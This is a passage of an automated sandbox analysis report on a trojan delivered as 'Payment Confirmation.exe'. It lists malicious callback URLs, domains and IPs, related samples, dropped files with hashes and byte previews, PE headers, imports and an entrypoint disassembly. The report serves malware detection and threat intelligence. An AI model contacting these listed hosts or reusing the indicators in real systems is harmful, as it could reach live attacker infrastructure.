          http://www.elliotpioneer.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA==0%Avira URL Cloudsafe
          http://www.altitudebc.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ==0%Avira URL Cloudsafe
          http://www.carts-amazon.com/b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz0%Avira URL Cloudsafe
          http://www.atp-cayenne.com/b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz0%Avira URL Cloudsafe
          www.thesewhitevvalls.com/b2c0/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          propage.beatstars.com
          		52.206.159.80
          		truefalse
            		high
            www.thesewhitevvalls.com
            		172.105.103.207
            		truetrueunknown
            chinaopedia.com
            		45.91.80.182
            		truetrueunknown
            playstarexch.com
            		34.102.136.180
            		truefalseunknown
            HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
            		3.223.115.185
            		truefalse
              		high
              anadolu.academy
              		94.73.147.156
              		truetrueunknown
              elliotpioneer.com
              		34.102.136.180
              		truefalse
                		unknown
                pflvcllbpf.hellomyai.com
                		134.122.133.171
                		truetrue
                  		unknown
                  www.unasolucioendesa.com
                  		82.98.134.154
                  		truetrue
                    		unknown
                    www.atp-cayenne.com
                    		62.210.5.81
                    		truetrue
                      		unknown
                      carts-amazon.com
                      		34.102.136.180
                      		truefalse
                        		unknown
                        www.anadolu.academy
                        		unknown
                        		unknowntrue
                          		unknown
                          www.playstarexch.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.lumberjackguitarloops.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.altitudebc.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.elliotpioneer.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.6233v.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.carts-amazon.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.chinaopedia.com
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.playstarexch.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw==false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.chinaopedia.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.anadolu.academy/b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfztrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.unasolucioendesa.com/b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfztrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.lumberjackguitarloops.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.elliotpioneer.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA==false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.altitudebc.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.carts-amazon.com/b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfzfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.atp-cayenne.com/b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfztrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        www.thesewhitevvalls.com/b2c0/true
                                        • Avira URL Cloud: safe
                                        		low

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.370640534.000000000095C000.00000004.00000020.sdmpfalse
                                          		high
                                          http://nsis.sf.net/NSIS_ErrorPayment Confirmation.exefalse
                                            		high
                                            http://www.litespeedtech.com/error-pagemsiexec.exe, 0000000B.00000002.630481531.0000000004B72000.00000004.00020000.sdmpfalse
                                              		high
                                              http://nsis.sf.net/NSIS_ErrorErrorPayment Confirmation.exefalse
                                                		high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                52.206.159.80
                                                		propage.beatstars.comUnited States
                                                		14618AMAZON-AESUSfalse
                                                45.91.80.182
                                                		chinaopedia.comUnited Kingdom
                                                		209484ASIANETGBtrue
                                                172.105.103.207
                                                		www.thesewhitevvalls.comUnited States
                                                		63949LINODE-APLinodeLLCUStrue
                                                62.210.5.81
                                                		www.atp-cayenne.comFrance
                                                		12876OnlineSASFRtrue
                                                34.102.136.180
                                                		playstarexch.comUnited States
                                                		15169GOOGLEUSfalse
                                                94.73.147.156
                                                		anadolu.academyTurkey
                                                		34619CIZGITRtrue
                                                82.98.134.154
                                                		www.unasolucioendesa.comSpain
                                                		42612DINAHOSTING-ASEStrue
                                                3.223.115.185
                                                		HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comUnited States
                                                		14618AMAZON-AESUSfalse

                                                General Information

                                                Joe Sandbox Version:33.0.0 White Diamond
                                                Analysis ID:502129
                                                Start date:13.10.2021
                                                Start time:16:30:06
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 10m 56s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:Payment Confirmation.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:24
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@7/2@11/8
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 26.6% (good quality ratio 23.5%)
                                                • Quality average: 74.2%
                                                • Quality standard deviation: 33.2%
                                                HCA Information:
                                                • Successful, ratio: 78%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.82.209.183, 2.20.178.56, 2.20.178.10, 20.54.110.249, 40.112.88.60, 2.20.178.33, 2.20.178.24, 95.100.216.89
                                                • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                • Not all processes where analyzed, report is missing behavior information

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                52.206.159.802WK7SGkGVZ.exeGet hashmaliciousBrowse
                                                • www.lumberjackguitarloops.com/b2c0/?7nlpd=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&5jlp=4halC6h
                                                jnnbbMX9Ch.exeGet hashmaliciousBrowse
                                                • www.lumberjackguitarloops.com/b2c0/?3f=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&BZe=kp3h4dC8BXM0A010
                                                vbc.exeGet hashmaliciousBrowse
                                                • www.lumberjackguitarloops.com/b2c0/?yFN4sV7X=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&y48t=zbm4GzHpaJR
                                                DUE PAYMENT.exeGet hashmaliciousBrowse
                                                • www.lumberjackguitarloops.com/b2c0/?2dpPwJP=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&YVeD=TX_h
                                                678901.exeGet hashmaliciousBrowse
                                                • www.lumberjackguitarloops.com/b2c0/?T0DTobah=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ==&XXut=DtHTzXpHJvwTW
                                                SOA.exeGet hashmaliciousBrowse
                                                • www.lumberjackguitarloops.com/b2c0/?3ff=y6AT2b&m4C=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJAwG6aDcVM1S
                                                Details for bookings.exeGet hashmaliciousBrowse
                                                • www.superbbsuper.com/t052/?ndndnH=UtWlrPo0yz28&AjR=dnoQ9Fq0Tjgk912J2nPmmxMg6AfDnqRukncs3air9eV/cbfskXhsbeNgpyNtUTPj9Sxb
                                                45.91.80.182jnnbbMX9Ch.exeGet hashmaliciousBrowse
                                                • www.chinaopedia.com/b2c0/?3f=qdiIlJawxdwAaLin48sa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYcW7pTjsxcMH&pRvL1=_T_XyD6
                                                vbc.exeGet hashmaliciousBrowse
                                                • www.chinaopedia.com/b2c0/?yFN4sV7X=qdiIlJawxdwAaLin48sa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYcW7pTjsxcMH&9redQX=Kxl0dTlPOf
                                                CpUNO6WMEm.exeGet hashmaliciousBrowse
                                                • www.chinaopedia.com/b2c0/?m48dC6Y=qdiIlJawxdwAaLin48sa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYcW7pTjsxcMH&Zj=DBZlR
                                                DUE PAYMENT.exeGet hashmaliciousBrowse
                                                • www.chinaopedia.com/b2c0/?2dpPwJP=qdiIlJawxdwAaLin48sa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYcW7pTjsxcMH&uN9=3fPH4rk8fd4xHD

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                propage.beatstars.com2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                jnnbbMX9Ch.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                vbc.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                DUE PAYMENT.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                678901.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                SOA.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                Details for bookings.exeGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                EME_PO.47563.xlsxGet hashmaliciousBrowse
                                                • 52.206.159.80
                                                www.thesewhitevvalls.compKD3j672HL.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                DEUXRWq2W8.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                09090.xlsxGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                82051082.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                8205108.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                jnnbbMX9Ch.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                vbc.exeGet hashmaliciousBrowse
                                                • 172.105.103.207
                                                CpUNO6WMEm.exeGet hashmaliciousBrowse
                                                • 50.17.5.224

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                ASIANETGBjnnbbMX9Ch.exeGet hashmaliciousBrowse
                                                • 45.91.80.182
                                                vbc.exeGet hashmaliciousBrowse
                                                • 45.91.80.182
                                                CpUNO6WMEm.exeGet hashmaliciousBrowse
                                                • 45.91.80.182
                                                DUE PAYMENT.exeGet hashmaliciousBrowse
                                                • 45.91.80.182
                                                sprogr.exeGet hashmaliciousBrowse
                                                • 155.235.98.69
                                                dmtkgN4tPg.exeGet hashmaliciousBrowse
                                                • 91.216.190.111
                                                googlechrome_3843.exeGet hashmaliciousBrowse
                                                • 155.235.80.79
                                                SecuriteInfo.com.Trojan.DnsChange.10846.3052.exeGet hashmaliciousBrowse
                                                • 23.236.69.114
                                                AMAZON-AESUSPayment Information MT103.exeGet hashmaliciousBrowse
                                                • 18.215.13.95
                                                qalTySElfjGet hashmaliciousBrowse
                                                • 34.226.20.105
                                                rLGunciziYGet hashmaliciousBrowse
                                                • 54.196.47.175
                                                JuufQURFPh.exeGet hashmaliciousBrowse
                                                • 50.16.216.118
                                                ut5yFyWEDdGet hashmaliciousBrowse
                                                • 44.222.19.141
                                                jew.x86Get hashmaliciousBrowse
                                                • 54.167.221.252
                                                ckYh27IjHJGet hashmaliciousBrowse
                                                • 34.236.224.188
                                                TM2ALMOZ8QGet hashmaliciousBrowse
                                                • 18.205.154.215
                                                cM5cZsOuggGet hashmaliciousBrowse
                                                • 54.138.164.249
                                                jew.x86Get hashmaliciousBrowse
                                                • 35.172.163.150
                                                DHL-Waybill.exeGet hashmaliciousBrowse
                                                • 54.208.212.1
                                                UaBxIF11A6Get hashmaliciousBrowse
                                                • 54.82.231.227
                                                80wVQ9c87mGet hashmaliciousBrowse
                                                • 34.238.201.118
                                                ubr43ro8gnGet hashmaliciousBrowse
                                                • 52.3.190.129
                                                DQak2G9Ly5Get hashmaliciousBrowse
                                                • 44.196.235.84
                                                x86Get hashmaliciousBrowse
                                                • 54.53.174.239
                                                sora.x86Get hashmaliciousBrowse
                                                • 44.192.229.159
                                                xd.armGet hashmaliciousBrowse
                                                • 52.0.161.15
                                                R0987653400008789.exeGet hashmaliciousBrowse
                                                • 50.17.226.156
                                                pKD3j672HL.exeGet hashmaliciousBrowse
                                                • 23.21.157.88

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\jkajud1yvpgnu8q
                                                Process:C:\Users\user\Desktop\Payment Confirmation.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):219451
                                                Entropy (8bit):7.993041781240184
                                                Encrypted:true
                                                SSDEEP:6144:6YaKKKKKKKKKKKKKQytJ7SVtrHTKld2xozO6:vJWLrHAIuzO6
                                                MD5:D1F72710AC133640BEEE60FCF6237F37
                                                SHA1:E5153D750F3C97EA0227BFE83BE3B6E98F4A1B50
                                                SHA-256:B8C3F629761EF0C1FADBE9111356C7F82947BE6CECD42F2C5238E0A6101D0A1A
                                                SHA-512:504151BF950F495BD031ADAE6887A3D09E5DC3C9E993541B92422A76230E38593B6A00705A7E3CD07066A05409A98366CFE98118D7C97102E90E5D58D9594388
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..3.0..9..q(....X..Ad.`..2.......^~........{.g...H1\.Uny...?...:AdD...e..f...{[...qQcC......Q.2MZ_...UT$Ir.......(_.."'..&.1..L$.}..^.6.B...` '.L..*....+.......M.B..cn?..O.m.E.X....2.._kTq.......4.0..7$....?%.0B.... U..3c'.u...G.}<Cu.."_..a.S.}..8....9.|.......Q..z.".;..kF.....^~.......<.{.g...H1\.Uny.V.?.R..A.(W.).......;n\........?A..q$..$.Ar<..g....v...!2RP..."'..&/.\*:.....i$....\.N...1$.....H.GJ./d.|..n........]F.m.X...Wm2.=q.T......,.....k7n..w.?%.0B.....U..3c'y6.....}.Cu.e"_..a.S.}......9.<...m...Q..O...;..k......^~........{.g...H1\.Uny.V.?.R..A.(W.).......;n\........?A..q$..$.Ar<..g....v...!2RP..."'..&/.\*:.....i$....\.N...1$.....H.GJ./d.|..n.....n?..O.m.._X.0m2._!.Tq.....,.....k7$....?%.0B.....U..3c'y6.....}.Cu.e"_..a.S.}......9.<...m...Q..O...;..k......^~........{.g...H1\.Uny.V.?.R..A.(W.).......;n\........?A..q$..$.Ar<..g....v...!2RP..."'..&/.\*:.....i$....\.N...1$.....H.GJ./d.|..n.....n?..O.m.._X.0m2._!.Tq.....,.....k7$....?%.0B.....U..3c
                                                C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll
                                                Process:C:\Users\user\Desktop\Payment Confirmation.exe
                                                File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):107008
                                                Entropy (8bit):6.3935752740603675
                                                Encrypted:false
                                                SSDEEP:1536:XlGfGAPqPOicsu0WpmS89PdDeSGTzIfTw83qVlIHyaaEil3Wkly9ncobUfs+ulZ6:1GfGAIOqXSKS13nKixlyrquv
                                                MD5:D4233FEFC9328CC30B0EF014BEB2F51B
                                                SHA1:302180A5EDB1FD653D7884BB60172E6EDFBBEAC4
                                                SHA-256:1827A3002964434B0ACFF1359241948E334148D3413312CFEA326CAE8F269758
                                                SHA-512:B3E19C83E631B6A8B8B0D00AB14AF811519765B737F1497F27E8C3A8C3328038967DBB6095671E4095AF48D6355B5F13CEC20C38EF2DFB14CC2AE8E9482DE4AF
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 3%
                                                Reputation:low
                                                Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....{fa...........!....."...|.......*..............................................................................<...J...........................................................................h]..H...............|............................text...A .......".................. ..`.rdata...R...@...T...&..............@..@.data....C.......&...z..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.4809595381543454
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Payment Confirmation.exe
                                                File size:455901
                                                MD5:98ffc3c812e6cec919ebd286973e2002
                                                SHA1:b0d1a65445a7923870ad23ec4d80f592e808c987
                                                SHA256:014d0ece0d472eaea73698d634308303ddb9f227f39d339a66416c3cb744d2c1
                                                SHA512:5875f8f2c736cbf501c25635f5c9014e499a7fce01f139315cbf5c0d3c45e1e8568a9fa8ddfe60cb0a44804a7677fdcd411eab4be6177926649b1b691d97a721
                                                SSDEEP:6144:hBlL/NDevWMKIPT48zhmgL58KCjuLkTMm6GBX3KTDDC3cz/3aKkm3HC:n6B8KC4kTrV3KlziKkR
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                                File Icon

                                                Icon Hash:d2e2ececd2e4b8c0

                                                Static PE Info

                                                General

                                                Entrypoint:0x4030fb
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                Entrypoint Preview

                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebx
                                                mov dword ptr [esp+14h], 00409168h
                                                mov dword ptr [esp+1Ch], ebx
                                                mov byte ptr [esp+18h], 00000020h
                                                call dword ptr [004070B0h]
                                                call dword ptr [004070ACh]
                                                cmp ax, 00000006h
                                                je 00007FE7208FACF3h
                                                push ebx
                                                call 00007FE7208FDAD4h
                                                cmp eax, ebx
                                                je 00007FE7208FACE9h
                                                push 00000C00h
                                                call eax
                                                mov esi, 00407280h
                                                push esi
                                                call 00007FE7208FDA50h
                                                push esi
                                                call dword ptr [00407108h]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], bl
                                                jne 00007FE7208FACCDh
                                                push 0000000Dh
                                                call 00007FE7208FDAA8h
                                                push 0000000Bh
                                                call 00007FE7208FDAA1h
                                                mov dword ptr [00423F44h], eax
                                                call dword ptr [00407038h]
                                                push ebx
                                                call dword ptr [0040726Ch]
                                                mov dword ptr [00423FF8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 0041F4F0h
                                                call dword ptr [0040715Ch]
                                                push 0040915Ch
                                                push 00423740h
                                                call 00007FE7208FD6D4h
                                                call dword ptr [0040710Ch]
                                                mov ebp, 0042A000h
                                                push eax
                                                push ebp
                                                call 00007FE7208FD6C2h
                                                push ebx
                                                call dword ptr [00407144h]

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x28068.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x2d0000x280680x28200False0.26199255257data5.8434826371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x2d2e00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x3db080x94a8dataEnglishUnited States
                                                RT_ICON0x46fb00x5488dataEnglishUnited States
                                                RT_ICON0x4c4380x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 248, next used block 520093696EnglishUnited States
                                                RT_ICON0x506600x25a8dataEnglishUnited States
                                                RT_ICON0x52c080x10a8dataEnglishUnited States
                                                RT_ICON0x53cb00x988dataEnglishUnited States
                                                RT_ICON0x546380x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                RT_DIALOG0x54aa00x100dataEnglishUnited States
                                                RT_DIALOG0x54ba00x11cdataEnglishUnited States
                                                RT_DIALOG0x54cc00x60dataEnglishUnited States
                                                RT_GROUP_ICON0x54d200x76dataEnglishUnited States
                                                RT_MANIFEST0x54d980x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                Imports

                                                DLLImport
                                                KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
